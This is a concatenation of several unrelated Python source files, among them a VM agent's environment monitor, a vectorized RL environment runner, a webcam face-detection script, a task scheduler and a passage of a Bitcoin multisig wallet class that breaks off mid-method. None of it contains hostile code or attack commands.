            PeriodicOperation("_cleanup_goal_state_history", self._cleanup_goal_state_history, conf.get_goal_state_history_cleanup_period())
        ]
        if conf.enable_firewall():
            self._periodic_operations.append(PeriodicOperation("_enable_firewall", self._enable_firewall, conf.get_enable_firewall_period()))
        if conf.get_root_device_scsi_timeout() is not None:
            self._periodic_operations.append(PeriodicOperation("_set_root_device_scsi_timeout", self._set_root_device_scsi_timeout, conf.get_root_device_scsi_timeout_period()))
        if conf.get_monitor_hostname():
            self._periodic_operations.append(PeriodicOperation("_monitor_hostname", self._monitor_hostname_changes, conf.get_monitor_hostname_period()))

    def run(self):
        """Capture baseline state (routes, hostname, dhcp pids) and start the monitor thread."""
        if not self.stopped:
            logger.info("Stop existing env monitor service.")
            self.stop()
        self.stopped = False
        logger.info("Start env monitor service.")
        self.dhcp_handler.conf_routes()
        self.hostname = self.osutil.get_hostname_record()
        self.dhcp_id_list = self.get_dhcp_client_pid()
        self.start()

    def is_alive(self):
        return self.server_thread.is_alive()

    def start(self):
        self.server_thread = threading.Thread(target=self.monitor)
        # MODERNIZATION FIX: Thread.setDaemon()/setName() are deprecated
        # aliases; assign the daemon/name attributes directly.
        self.server_thread.daemon = True
        self.server_thread.name = self.get_thread_name()
        self.server_thread.start()

    def monitor(self):
        """Thread body: run every periodic operation in a loop until stopped."""
        try:
            # The initialization of ProtocolUtil for the Environment thread should be done within the thread itself rather
            # than initializing it in the ExtHandler thread. This is done to avoid any concurrency issues as each
            # thread would now have its own ProtocolUtil object as per the SingletonPerThread model.
            self.protocol_util = get_protocol_util()
            self._protocol = self.protocol_util.get_protocol()
            while not self.stopped:
                try:
                    for op in self._periodic_operations:  # pylint: disable=C0103
                        op.run()
                except Exception as e:  # pylint: disable=C0103
                    logger.error("An error occurred in the environment thread main loop; will skip the current iteration.\n{0}", ustr(e))
                finally:
                    PeriodicOperation.sleep_until_next_operation(self._periodic_operations)
        except Exception as e:  # pylint: disable=C0103
            logger.error("An error occurred in the environment thread; will exit the thread.\n{0}", ustr(e))

    def _remove_persistent_net_rules_period(self):
        self.osutil.remove_rules_files()

    def _enable_firewall(self):
        # If the rules ever change we must reset all rules and start over again.
        #
        # There was a rule change at 2.2.26, which started dropping non-root traffic
        # to WireServer. The previous rules allowed traffic. Having both rules in
        # place negated the fix in 2.2.26.
        if not self._reset_firewall_rules:
            self.osutil.remove_firewall(dst_ip=self._protocol.get_endpoint(), uid=os.getuid())
            self._reset_firewall_rules = True
        success = self.osutil.enable_firewall(dst_ip=self._protocol.get_endpoint(), uid=os.getuid())
        add_periodic(
            logger.EVERY_HOUR,
            AGENT_NAME,
            version=CURRENT_VERSION,
            op=WALAEventOperation.Firewall,
            is_success=success,
            log_event=False)

    def _set_root_device_scsi_timeout(self):
        self.osutil.set_scsi_disks_timeout(conf.get_root_device_scsi_timeout())

    def _monitor_hostname_changes(self):
        """Publish the new hostname if it differs from the recorded one."""
        curr_hostname = socket.gethostname()
        if curr_hostname != self.hostname:
            logger.info("EnvMonitor: Detected hostname change: {0} -> {1}",
                        self.hostname,
                        curr_hostname)
            self.osutil.set_hostname(curr_hostname)
            self.osutil.publish_hostname(curr_hostname)
            self.hostname = curr_hostname

    def get_dhcp_client_pid(self):
        """Return the sorted list of DHCP client PIDs (empty on failure)."""
        pid = []
        try:
            # return a sorted list since handle_dhclient_restart needs to compare the previous value with
            # the new value and the comparison should not be affected by the order of the items in the list
            pid = sorted(self.osutil.get_dhcp_pid())
            if len(pid) == 0 and self.dhcp_warning_enabled:  # pylint: disable=len-as-condition
                logger.warn("Dhcp client is not running.")
        except Exception as exception:
            if self.dhcp_warning_enabled:
                logger.error("Failed to get the PID of the DHCP client: {0}", ustr(exception))
        # Warn only once per outage: re-enable the warning after success.
        self.dhcp_warning_enabled = len(pid) != 0
        return pid

    def _monitor_dhcp_client_restart(self):
        self.handle_dhclient_restart()

    def handle_dhclient_restart(self):
        """Restore routes if the dhcp client process set has changed."""
        if len(self.dhcp_id_list) == 0:  # pylint: disable=len-as-condition
            self.dhcp_id_list = self.get_dhcp_client_pid()
            return
        if all(self.osutil.check_pid_alive(pid) for pid in self.dhcp_id_list):
            return
        new_pid = self.get_dhcp_client_pid()
        if len(new_pid) != 0 and new_pid != self.dhcp_id_list:  # pylint: disable=len-as-condition
            logger.info("EnvMonitor: Detected dhcp client restart. Restoring routing table.")
            self.dhcp_handler.conf_routes()
            self.dhcp_id_list = new_pid

    def _cleanup_goal_state_history(self):
        """
        Purge history and create a .zip of the history that has been preserved.
        """
        self.archiver.purge()
        self.archiver.archive()

    def stop(self):
        """
        Stop server communication and join the thread to main thread.
        """
        self.stopped = True
        if self.server_thread is not None:
            self.server_thread.join()
|
__main__.py | # coding: utf-8
from logging import info
import logging; logging.basicConfig(level=logging.DEBUG)
from json import dumps
from multiprocessing import Process
from tentacle.sensor import discover
from tentacle.client import publish
# Discover every attached sensor, merge each sensor's reported fields into
# one aggregate status payload, fork a background measuring loop per
# sensor, then announce the combined status over MQTT-style publish.
sensors = discover()
payload = {}
for sensor in sensors:
    # Fold this sensor's dict into the aggregate payload.
    payload = {**payload, **sensor.get_dict()}
    #TODO Decide if background daemons are better: daemon=True
    process = Process(target=sensor.measuring_loop, name=sensor.sensor_id)
    process.start()
    info(f"Started background process {process.pid}: {process.name} for {sensor.sensor_id}")
publish('tentacle/status', payload=dumps(payload))
|
poc_ws_client.py | #!/usr/bin/env python
import asyncio
import websockets
from threading import Thread
from uuid import uuid4
from theia.comm import Client
from theia.model import Event
# Proof-of-concept REPL client: connect to a local theia event server,
# print anything the server pushes back, and ship each typed line as an
# Event from a background thread while the asyncio loop runs the socket.
loop = asyncio.get_event_loop()
loop.set_debug(True)
print('1')


def recv(msg):
    """Print every message pushed back from the server."""
    print('RECEIVED: ', msg)


cl = Client(loop, host='localhost', port=8765, path='/event', recv=recv)
cl.connect()


def do_send():
    """Read lines from stdin forever and send each as an Event."""
    while True:
        msg = input('>')
        # IDIOM FIX: renamed local `id` -> `event_id`; `id` shadowed the builtin.
        event_id = str(uuid4())
        cl.send_event(Event(id=event_id, source='repl-test', content=msg))
        print(' >>%s:%s' % (event_id, msg))


# Input runs on a plain thread so it does not block the event loop.
Thread(target=do_send).start()
loop.run_forever()
|
subproc_vec_env.py | import multiprocessing as mp
import numpy as np
from .vec_env import VecEnv, CloudpickleWrapper, clear_mpi_env_vars
def worker(remote, parent_remote, env_fn_wrappers):
    """Subprocess entry point: run a batch of envs and serve pipe commands.

    remote          -- this process's end of the pipe (commands in, results out)
    parent_remote   -- the parent's end; closed here so only the parent holds it
    env_fn_wrappers -- CloudpickleWrapper whose .x is a list of env constructors
    """
    def step_env(env, action):
        # Auto-reset finished episodes so the vectorized env never stalls.
        ob, reward, done, info = env.step(action)
        if done:
            ob = env.reset()
        return ob, reward, done, info

    parent_remote.close()
    envs = [env_fn_wrapper() for env_fn_wrapper in env_fn_wrappers.x]
    try:
        # Command loop: one request in, one response out, until 'close'.
        while True:
            cmd, data = remote.recv()
            if cmd == 'step':
                # `data` is a list of actions, one per env in this process.
                remote.send([step_env(env, action) for env, action in zip(envs, data)])
            elif cmd == 'reset':
                # NOTE(review): `ex_init` presumably seeds the reset state;
                # the same value is passed to every env here -- confirm.
                remote.send([env.reset(ex_init=data) for env in envs])
            elif cmd == 'render':
                remote.send([env.render(mode='rgb_array') for env in envs])
            elif cmd == 'close':
                remote.close()
                break
            elif cmd == 'get_spaces_spec':
                # Spaces/spec are wrapped so they survive pickling over the pipe.
                remote.send(CloudpickleWrapper((envs[0].observation_space, envs[0].action_space, envs[0].spec)))
            else:
                raise NotImplementedError
    except KeyboardInterrupt:
        print('SubprocVecEnv worker: got KeyboardInterrupt')
    finally:
        # Always release env resources, even on error/interrupt.
        for env in envs:
            env.close()
class SubprocVecEnv(VecEnv):
    """
    VecEnv that runs multiple environments in parallel in subproceses and communicates with them via pipes.
    Recommended to use when num_envs > 1 and step() can be a bottleneck.
    """
    def __init__(self, env_fns, spaces=None, context='spawn', in_series=1):
        """
        Arguments:

        env_fns: iterable of callables -  functions that create environments to run in subprocesses. Need to be cloud-pickleable
        in_series: number of environments to run in series in a single process
        (e.g. when len(env_fns) == 12 and in_series == 3, it will run 4 processes, each running 3 envs in series)
        """
        self.waiting = False
        self.closed = False
        self.in_series = in_series
        nenvs = len(env_fns)
        assert nenvs % in_series == 0, "Number of envs must be divisible by number of envs to run in series"
        self.nremotes = nenvs // in_series
        # Split the constructors into one chunk per worker process.
        env_fns = np.array_split(env_fns, self.nremotes)
        ctx = mp.get_context(context)
        # One pipe per worker: `remotes` stay in the parent, `work_remotes`
        # go to the children.
        self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(self.nremotes)])
        self.ps = [ctx.Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
                   for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
        for p in self.ps:
            p.daemon = True  # if the main process crashes, we should not cause things to hang
            with clear_mpi_env_vars():
                p.start()
        # Close the parent's copies of the worker-side pipe ends.
        for remote in self.work_remotes:
            remote.close()
        # Ask the first worker for the (pickled) spaces and spec.
        self.remotes[0].send(('get_spaces_spec', None))
        observation_space, action_space, self.spec = self.remotes[0].recv().x
        self.viewer = None
        VecEnv.__init__(self, nenvs, observation_space, action_space)

    def step_async(self, actions):
        """Send one chunk of actions to each worker without waiting."""
        self._assert_not_closed()
        actions = np.array_split(actions, self.nremotes)
        for remote, action in zip(self.remotes, actions):
            remote.send(('step', action))
        self.waiting = True

    def step_wait(self):
        """Collect the results of a previous step_async call."""
        self._assert_not_closed()
        results = [remote.recv() for remote in self.remotes]
        results = _flatten_list(results)
        self.waiting = False
        obs, rews, dones, infos = zip(*results)
        return _flatten_obs(obs), np.stack(rews), np.stack(dones), infos

    def reset(self, ex_inits=None, record=False):
        """Reset all envs; optionally pass per-worker ex_init values.

        NOTE(review): ex_inits is zipped against the worker pipes, and each
        worker applies its single ex_init to all of its in-series envs.
        """
        self._assert_not_closed()
        if ex_inits is not None:
            assert len(ex_inits) >= self.num_envs
            for remote, ex_init in zip(self.remotes, ex_inits):
                remote.send(('reset', ex_init))
        else:
            for remote in self.remotes:
                remote.send(('reset', None))
        obs = [remote.recv() for remote in self.remotes]
        obs = _flatten_list(obs)
        return _flatten_obs(obs)

    def close_extras(self):
        """Drain pending replies, tell workers to exit, and join them."""
        self.closed = True
        if self.waiting:
            for remote in self.remotes:
                remote.recv()
        for remote in self.remotes:
            remote.send(('close', None))
        for p in self.ps:
            p.join()

    def get_images(self):
        self._assert_not_closed()
        # nirbz: restricting the number of images because of memory issues
        if len(self.remotes) > 16:
            remotes = self.remotes[:16]
        else:
            remotes = self.remotes
        for pipe in remotes:
            pipe.send(('render', None))
        imgs = [pipe.recv() for pipe in remotes]
        imgs = _flatten_list(imgs)
        return imgs

    def _assert_not_closed(self):
        assert not self.closed, "Trying to operate on a SubprocVecEnv after calling close()"

    def __del__(self):
        if not self.closed:
            self.close()
def _flatten_obs(obs):
assert isinstance(obs, (list, tuple))
assert len(obs) > 0
if isinstance(obs[0], dict):
keys = obs[0].keys()
flattened_obs = {k: np.stack([o[k] for o in obs]) for k in keys}
return flattened_obs
else:
return np.stack(obs)
def _flatten_list(l):
assert isinstance(l, (list, tuple))
assert len(l) > 0
assert all([len(l_) > 0 for l_ in l])
return [l__ for l_ in l for l__ in l_]
|
LiveDetect.py | # -*- coding: utf-8 -*-
"""
Created on Fri Oct 30 14:46:44 2020
@author: Ayman Al Jabri
This script multithreads face detection on webcam . I Tried it on 16' MacPro and it works smoothly
If you wanna run it in faceRecognition mode, make sure to train the model first and save it in
results directory along with classes. To do that run averroes.py first in /FaceRecognition folder.
Tested with:
opencv-contrib-python==4.5.3
"""
import cv2
import queue
import joblib
import threading
import argparse
from FaceDetection.models import f_net, haar, hog
import pandas as pd
# Class labels produced by the face-recognition training pipeline
# (averroes.py, per the module docstring); reshaped to a flat 1-D array so
# classifier predictions can index it directly.
classes = pd.read_csv('FaceRecognition/results/classes.csv')
classes = classes.values.reshape(len(classes))
class FaceDetectLive(object):
    '''
    Create a face-detection object using webcam.
    classifier: choices between "HAAR", "FaceNet" or "HOG"
    recognize: path to an sklearn modle trained on features extracted from Facenet
    '''
    def __init__(self, classifier, recognize=None, skip_n=1,
                 h_res=400, v_res=600, font=cv2.FONT_HERSHEY_DUPLEX, th=False):
        self.clf = classifier
        self.recognize = recognize
        if recognize is not None:
            self.model = joblib.load(recognize)
            self.net = f_net.net
        self.skip_n = skip_n      # run detection only every skip_n-th frame
        self.h_res = h_res
        self.v_res = v_res
        self.font = font
        self.__VideoCapture__()
        self.q = queue.deque(maxlen=100)  # most recent detection results
        self.th = th              # detect on a worker thread when True
        self.idx = 0              # frame counter

    def __VideoCapture__(self):
        """Open the default webcam and apply the requested resolution."""
        self.cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)
        self.cap.open(0)
        self.cap.set(3, self.h_res)
        self.cap.set(4, self.v_res)

    def __timer__(self):
        """True on every skip_n-th frame (when detection should run)."""
        return (self.idx % self.skip_n == 0)

    def __thread__(self, frame):
        """Run detection for *frame* on a background thread."""
        th = threading.Thread(target=self.__append_faces__, args=(frame,))
        th.start()

    def __append_faces__(self, frame):
        """Detect faces in *frame* and queue the result."""
        faces = self.clf.find_faces(frame)
        self.q.append(faces)

    def play(self):
        """Main webcam loop: detect (and optionally recognize) until 'q' is pressed."""
        faces_old, old_names, faces = None, None, None
        while True:
            good, frame = self.cap.read()
            if not good:
                continue
            frame = cv2.flip(frame, 1)  # flip horizontaly because it looks better!
            if self.__timer__():
                if self.th:
                    self.__thread__(frame)
                else:
                    self.__append_faces__(frame)
            # Fall back to the last known detections when none are queued.
            faces = self.q.pop() if len(self.q) > 0 else faces_old
            # Recognition is expensive: run it only every 30th frame.
            if faces is not None and self.recognize and self.idx % 30 == 0:
                try:
                    ii = self.clf(frame)
                    features = self.net(ii).detach()
                    d = self.model.predict(features).tolist()
                    names = classes[d]
                    old_names = names
                # BUG FIX: narrowed from bare `except:` (which also caught
                # KeyboardInterrupt/SystemExit); recognition stays
                # deliberately best-effort, so failures are still ignored.
                except Exception:
                    pass
            faces_old = faces
            frame = self.clf.draw_rect(frame, faces_old, old_names)
            self.idx += 1
            cv2.imshow('face', frame)
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
        self.cap.release()
        cv2.destroyAllWindows()
        self.q.clear()
if __name__ == "__main__":
    # CLI entry point: pick a detector backend and start the live webcam loop.
    parser = argparse.ArgumentParser()
    parser.add_argument('--file',
                        help='Name and path of the HAAR file')
    parser.add_argument('--n', type=int, default=1,
                        help='Detect faces on the Nth frame')
    parser.add_argument('--algo',
                        help='Algorithm to use: choose between: "haar", "hog" and "facenet"')
    parser.add_argument('--threading', default=False, action='store_true',
                        help='Use threading to detect faces')
    parser.add_argument('--recognize', action='store_true', default=False,
                        help='recognize the face using features')
    arg = parser.parse_args()
    pathM = None
    # fall back to the bundled frontal-face HAAR cascade when --file is absent
    fname = (arg.file if arg.file else 'FaceDetection/models/haarcascade_frontalface_default.xml')
    # --recognize implies the FaceNet detector (embeddings come from its net)
    if arg.algo == 'facenet' or arg.recognize:
        clf = f_net.FaceNet(**f_net.params)
        if arg.recognize:
            pathM = 'FaceRecognition/results/model.joblib'
    elif arg.algo == 'hog':
        clf = hog.HOG()
    else:
        clf = haar.HAAR(fname)
    cam = FaceDetectLive(clf, recognize=pathM, skip_n=arg.n, th=arg.threading)
    cam.play()
task.py | import time
import threading
class TaskResult(object):
    """Return codes a task function may hand back to the scheduler."""
    DONE = 0  # finished -- remove the task
    CONT = 1  # keep going -- reschedule for the next pass
    WAIT = 2  # configured delay not yet elapsed -- try again later


class TaskError(RuntimeError):
    """
    A task specific runtime error
    """


class Task(object):
    """A schedulable unit of work wrapping a callable and its timing state."""

    def __init__(self, id):
        self.id = id
        self.name = 'Task-%d' % id
        self.function = None          # callable(task, *args, **kwargs) -> TaskResult
        self.timestamp = time.time()  # reference point for delay measurement
        self.delay = 0.0              # seconds to wait before each execution
        self.can_delay = True         # whether the delay currently applies
        self.args = []
        self.kwargs = {}
        self.active = False           # set by the TaskManager on (de)activation

    # convenience aliases so task functions can `return task.done` etc.
    @property
    def done(self):
        return TaskResult.DONE

    @property
    def cont(self):
        return TaskResult.CONT

    @property
    def wait(self):
        return TaskResult.WAIT

    @property
    def duration(self):
        """Seconds elapsed since the last timestamp reset."""
        return time.time() - self.timestamp

    def execute(self):
        """Run the wrapped callable, honoring the configured delay."""
        if not callable(self.function):
            raise TaskError('Failed to execute task %s, function not callable!' % self.name)
        if self.can_delay:
            if self.duration < self.delay:
                return self.wait
            self.timestamp = time.time()
        return self.function(self, *self.args, **self.kwargs)

    def run(self):
        """Execute, but only when the manager has activated this task."""
        if not self.active:
            raise TaskError('Failed to run task %s, never activated!' % self.name)
        return self.execute()

    def destroy(self):
        """Drop references so the task (and its closure) can be collected."""
        for attr in ('id', 'name', 'function', 'timestamp', 'args', 'kwargs'):
            setattr(self, attr, None)


class TaskManagerError(RuntimeError):
    """
    A task manager specific runtime error
    """


class TaskManager(object):
    """Cooperative scheduler that executes activated tasks once per pass."""

    TIMEOUT = 0.01  # seconds slept between scheduler passes

    def __init__(self):
        self.running = {}  # name -> task executed each pass
        self.waiting = {}  # name -> task queued for promotion
        self.id = 0        # source of unique task ids

    @property
    def next_id(self):
        """Allocate and return the next unique task id."""
        self.id += 1
        return self.id

    def has(self, name):
        """True when a task with this name is registered anywhere."""
        return name in self.running or name in self.waiting

    def delete(self, task, destroy):
        """Forget the task, optionally releasing its resources."""
        try:
            del self.waiting[task.name]
        except KeyError:
            del self.running[task.name]
        if destroy:
            task.destroy()

    def activate(self, task):
        """Queue a task for execution; it must not already be registered."""
        if self.has(task.name):
            raise TaskManagerError('Failed to activate task %s, already activated!' % task.name)
        task.active = True
        self.waiting[task.name] = task
        return task

    def deactivate(self, task, destroy=False):
        """Unregister a previously activated task."""
        if not self.has(task.name):
            raise TaskManagerError('Failed to deactivate task %s, never activated!' % task.name)
        task.active = False
        self.delete(task, destroy)

    def prepend(self, function, delay, *args, **kwargs):
        """Build a Task around *function* and activate it immediately."""
        task = Task(self.next_id)
        task.function, task.delay = function, delay
        task.args, task.kwargs = args, kwargs
        return self.activate(task)

    def add(self, function, *args, **kwargs):
        """Activate *function* with no delay."""
        return self.prepend(function, 0, *args, **kwargs)

    def add_delayed(self, delay, function, *args, **kwargs):
        """Activate *function*, first run deferred by *delay* seconds."""
        return self.prepend(function, delay, *args, **kwargs)

    def add_deferred(self, function):
        """Decorator: calling the wrapped function schedules it instead."""
        def decorate(*args, **kwargs):
            return self.add(function, *args, **kwargs)
        return decorate

    def remove(self, task):
        """Deactivate and destroy a task."""
        self.deactivate(task, destroy=True)

    def cycle(self, task):
        """Move a task back to the waiting queue for the next pass."""
        self.deactivate(task)
        self.activate(task)

    def mainloop(self):
        """Run forever: promote waiting tasks, execute running ones, sleep."""
        while True:
            # promote everything queued since the last pass
            for name in list(self.waiting):
                self.running[name] = self.waiting.pop(name)
            for task in list(self.running.values()):
                outcome = task.run()
                if task.can_delay:
                    task.can_delay = False
                if outcome == TaskResult.CONT:
                    self.cycle(task)
                elif outcome == TaskResult.WAIT:
                    task.can_delay = True
                else:
                    # DONE -- and any unrecognized result -- ends the task
                    self.remove(task)
            time.sleep(self.TIMEOUT)

    def run(self, threaded=True, daemon=True):
        """Start the mainloop, optionally on a (daemon) background thread."""
        try:
            if threaded:
                thread = threading.Thread(target=self.mainloop)
                thread.daemon = daemon
                thread.start()
            else:
                self.mainloop()
        except (KeyboardInterrupt, SystemExit):
            self.destroy()

    def destroy(self):
        """Destroy every registered task and reset the id counter."""
        for name in list(self.waiting):
            self.waiting.pop(name).destroy()
        for name in list(self.running):
            self.running.pop(name).destroy()
        self.id = 0
|
wallet.py | import copy, hashlib, json, logging, os
import time
from hwilib.descriptor import AddChecksum
from .device import Device
from .key import Key
from .util.merkleblock import is_valid_merkle_proof
from .helpers import der_to_bytes, sort_descriptor, fslock, parse_utxo
from .util.base58 import decode_base58
from .util.xpub import get_xpub_fingerprint
from hwilib.serializations import PSBT, CTransaction
from io import BytesIO
from .specter_error import SpecterError
import threading
import requests
from math import ceil
logger = logging.getLogger()
class Wallet():
    """A watch-only Specter wallet backed by a Bitcoin Core RPC wallet."""
    # if the wallet is old we import 300 addresses
    IMPORT_KEYPOOL = 300
    # a gap of 20 addresses is what many wallets do
    GAP_LIMIT = 20
    # minimal fee rate is slightly above 1 sat/vbyte
    # to avoid rounding errors
    MIN_FEE_RATE = 1.01
    def __init__(
        self,
        name,
        alias,
        description,
        address_type,
        address,
        address_index,
        change_address,
        change_index,
        keypool,
        change_keypool,
        recv_descriptor,
        change_descriptor,
        keys,
        devices,
        sigs_required,
        pending_psbts,
        fullpath,
        device_manager,
        manager,
        old_format_detected=False,
        last_block=None,
    ):
        """Bind wallet state, resolve devices, attach the Core RPC wallet and sync.

        Side effects: may derive fresh receive/change addresses, always pulls
        UTXO/balance data from the node, and re-saves the wallet file when it
        was loaded from an old on-disk format or the last seen block changed.
        """
        self.name = name
        self.alias = alias
        self.description = description
        self.address_type = address_type
        self.address = address
        self.address_index = address_index
        self.change_address = change_address
        self.change_index = change_index
        self.keypool = keypool
        self.change_keypool = change_keypool
        self.recv_descriptor = recv_descriptor
        self.change_descriptor = change_descriptor
        self.keys = keys
        # devices may arrive as Device instances or as aliases; resolve aliases
        self.devices = [
            (
                device
                if isinstance(device, Device)
                else device_manager.get_by_alias(device)
            )
            for device in devices
        ]
        if None in self.devices:
            raise Exception(
                'A device used by this wallet could not have been found!'
            )
        self.sigs_required = int(sigs_required)
        self.pending_psbts = pending_psbts
        self.fullpath = fullpath
        self.manager = manager
        # per-wallet RPC connection (Core wallet loaded at <rpc_path>/<alias>)
        self.rpc = self.manager.rpc.wallet(
            os.path.join(self.manager.rpc_path, self.alias)
        )
        self.last_block = last_block
        # empty strings mean the wallet never derived an address yet
        if address == '':
            self.getnewaddress()
        if change_address == '':
            self.getnewaddress(change=True)
        self.getdata()
        self.update()
        if old_format_detected or self.last_block != last_block:
            self.save_to_file()
    def update(self):
        """Refresh balance, gap-limit bookkeeping and node-side wallet info."""
        self.get_balance()
        self.check_addresses()
        self.get_info()
    def check_addresses(self):
        """Checking the gap limit is still ok.

        Scans transactions since the last seen block, extracts the highest
        used receive/change derivation indexes from hdkeypath, and derives
        fresh addresses until the current indexes pass every used one.
        """
        if self.last_block is None:
            obj = self.rpc.listsinceblock()
        else:
            # sometimes last_block is invalid, not sure why
            try:
                obj = self.rpc.listsinceblock(self.last_block)
            except:
                logger.error(f"Invalid block {self.last_block}")
                obj = self.rpc.listsinceblock()
        txs = obj["transactions"]
        last_block = obj["lastblock"]
        addresses = [tx["address"] for tx in txs]
        # remove duplicates
        addresses = list(dict.fromkeys(addresses))
        if len(addresses) > 0:
            # prepare rpc call
            calls = [("getaddressinfo", addr) for addr in addresses]
            # extract results
            res = [r["result"] for r in self.rpc.multi(calls)]
            # extract last two indexes of hdkeypath
            paths = [d["hdkeypath"].split("/")[-2:] for d in res if "hdkeypath" in d]
            # get change and recv addresses ("0/i" = receive branch, "1/i" = change)
            max_recv = max([int(p[1]) for p in paths if p[0] == "0"], default=-1)
            max_change = max([int(p[1]) for p in paths if p[0] == "1"], default=-1)
            # these calls will happen only if current addresses are used
            updated = False
            while max_recv >= self.address_index:
                self.getnewaddress(change=False, save=False)
                updated = True
            while max_change >= self.change_index:
                self.getnewaddress(change=True, save=False)
                updated = True
            # save only if needed
            if updated:
                self.save_to_file()
        self.last_block = last_block
@staticmethod
def parse_old_format(wallet_dict, device_manager):
old_format_detected = False
new_dict = {}
new_dict.update(wallet_dict)
if 'key' in wallet_dict:
new_dict['keys'] = [wallet_dict['key']]
del new_dict['key']
old_format_detected = True
if 'device' in wallet_dict:
new_dict['devices'] = [wallet_dict['device']]
del new_dict['device']
old_format_detected = True
devices = [device_manager.get_by_alias(device) for device in new_dict['devices']]
if len(new_dict['keys']) > 1 and 'sortedmulti' not in new_dict['recv_descriptor']:
new_dict['recv_descriptor'] = AddChecksum(new_dict['recv_descriptor'].replace('multi', 'sortedmulti').split('#')[0])
old_format_detected = True
if len(new_dict['keys']) > 1 and 'sortedmulti' not in new_dict['change_descriptor']:
new_dict['change_descriptor'] = AddChecksum(new_dict['change_descriptor'].replace('multi', 'sortedmulti').split('#')[0])
old_format_detected = True
if None in devices:
devices = [((device['name'] if isinstance(device, dict) else device) if (device['name'] if isinstance(device, dict) else device) in device_manager.devices else None) for device in new_dict['devices']]
if None in devices:
raise Exception('A device used by this wallet could not have been found!')
else:
new_dict['devices'] = [device_manager.devices[device].alias for device in devices]
old_format_detected = True
new_dict['old_format_detected'] = old_format_detected
return new_dict
@classmethod
def from_json(cls, wallet_dict, device_manager, manager, default_alias='', default_fullpath=''):
name = wallet_dict.get('name', '')
alias = wallet_dict.get('alias', default_alias)
description = wallet_dict.get('description', '')
address = wallet_dict.get('address', '')
address_index = wallet_dict.get('address_index', 0)
change_address = wallet_dict.get('change_address', '')
change_index = wallet_dict.get('change_index', 0)
keypool = wallet_dict.get('keypool', 0)
change_keypool = wallet_dict.get('change_keypool', 0)
sigs_required = wallet_dict.get('sigs_required', 1)
pending_psbts = wallet_dict.get('pending_psbts', {})
fullpath = wallet_dict.get('fullpath', default_fullpath)
last_block = wallet_dict.get('last_block', None)
wallet_dict = Wallet.parse_old_format(wallet_dict, device_manager)
try:
address_type = wallet_dict['address_type']
recv_descriptor = wallet_dict['recv_descriptor']
change_descriptor = wallet_dict['change_descriptor']
keys = [Key.from_json(key_dict) for key_dict in wallet_dict['keys']]
devices = wallet_dict['devices']
except:
raise Exception('Could not construct a Wallet object from the data provided.')
return cls(
name,
alias,
description,
address_type,
address,
address_index,
change_address,
change_index,
keypool,
change_keypool,
recv_descriptor,
change_descriptor,
keys,
devices,
sigs_required,
pending_psbts,
fullpath,
device_manager,
manager,
old_format_detected=wallet_dict['old_format_detected'],
last_block=last_block
)
def get_info(self):
try:
self.info = self.rpc.getwalletinfo()
except Exception:
self.info = {}
return self.info
    def getdata(self):
        """Load UTXOs and their labels from the node; roll the change address if used."""
        try:
            self.utxo = parse_utxo(self, self.rpc.listunspent(0))
            self.utxo_labels_list = self.getlabels(utxo["address"] for utxo in self.utxo)
        except Exception:
            self.utxo = []
            self.utxo_labels_list = {}
        self.get_info()
        # TODO: Should do the same for the non change address (?)
        # check if address was used already
        try:
            value_on_address = self.rpc.getreceivedbyaddress(
                self.change_address,
                0
            )
        except:
            # Could happen if address not in wallet (wallet was imported)
            # try adding keypool
            logger.info(f"Didn't get transactions on address {self.change_address}. Refilling keypool.")
            self.keypoolrefill(0, end=self.keypool, change=False)
            self.keypoolrefill(0, end=self.change_keypool, change=True)
            value_on_address = 0
        # if not - just return
        if value_on_address > 0:
            self.change_index += 1
            self.getnewaddress(change=True)
    @property
    def json(self):
        """Serializable snapshot of the wallet, as persisted by save_to_file().

        Note: "blockheight" and "labels" trigger RPC calls when accessed.
        """
        return {
            "name": self.name,
            "alias": self.alias,
            "description": self.description,
            "address_type": self.address_type,
            "address": self.address,
            "address_index": self.address_index,
            "change_address": self.change_address,
            "change_index": self.change_index,
            "keypool": self.keypool,
            "change_keypool": self.change_keypool,
            "recv_descriptor": self.recv_descriptor,
            "change_descriptor": self.change_descriptor,
            "keys": [key.json for key in self.keys],
            "devices": [device.alias for device in self.devices],
            "sigs_required": self.sigs_required,
            "pending_psbts": self.pending_psbts,
            "fullpath": self.fullpath,
            "last_block": self.last_block,
            "blockheight": self.blockheight,
            "labels": self.export_labels()
        }
    def save_to_file(self):
        """Persist the wallet JSON under the file-system lock, then notify the manager."""
        with fslock:
            with open(self.fullpath, "w+") as f:
                json.dump(self.json, f, indent=4)
        self.manager.update()
@property
def is_multisig(self):
return len(self.keys) > 1
@property
def locked_amount(self):
amount = 0
for psbt in self.pending_psbts:
amount += sum([utxo["witness_utxo"]["amount"] for utxo in self.pending_psbts[psbt]["inputs"]])
return amount
def delete_pending_psbt(self, txid):
try:
self.rpc.lockunspent(True, self.pending_psbts[txid]["tx"]["vin"])
except:
# UTXO was spent
pass
if txid in self.pending_psbts:
del self.pending_psbts[txid]
self.save_to_file()
    def update_pending_psbt(self, psbt, txid, raw):
        """Merge a (partially) signed PSBT back into the pending entry for *txid*.

        Updates the stored base64, the list of devices that have signed, and --
        when *raw* contains a finalized hex transaction -- marks the PSBT as
        fully signed. Raises SpecterError for unknown txids.
        """
        if txid in self.pending_psbts:
            self.pending_psbts[txid]["base64"] = psbt
            decodedpsbt = self.rpc.decodepsbt(psbt)
            signed_devices = self.get_signed_devices(decodedpsbt)
            self.pending_psbts[txid]["devices_signed"] = [dev.name for dev in signed_devices]
            if "hex" in raw:
                # finalized -- all required signatures are present
                self.pending_psbts[txid]["sigs_count"] = self.sigs_required
                self.pending_psbts[txid]["raw"] = raw["hex"]
            else:
                self.pending_psbts[txid]["sigs_count"] = len(signed_devices)
            self.save_to_file()
            return self.pending_psbts[txid]
        else:
            raise SpecterError("Can't find pending PSBT with this txid")
def save_pending_psbt(self, psbt):
self.pending_psbts[psbt["tx"]["txid"]] = psbt
self.rpc.lockunspent(False, psbt["tx"]["vin"])
self.save_to_file()
    def txlist(self, idx, wallet_tx_batch=100, validate_merkle_proofs=False):
        """Return one page (*idx*) of wallet transactions, newest first.

        Fetches wallet_tx_batch + 2 rows so duplicate change entries of send
        transactions can be filtered out; optionally validates each confirmed
        tx against its merkle proof. Returns [] on any RPC failure.
        """
        try:
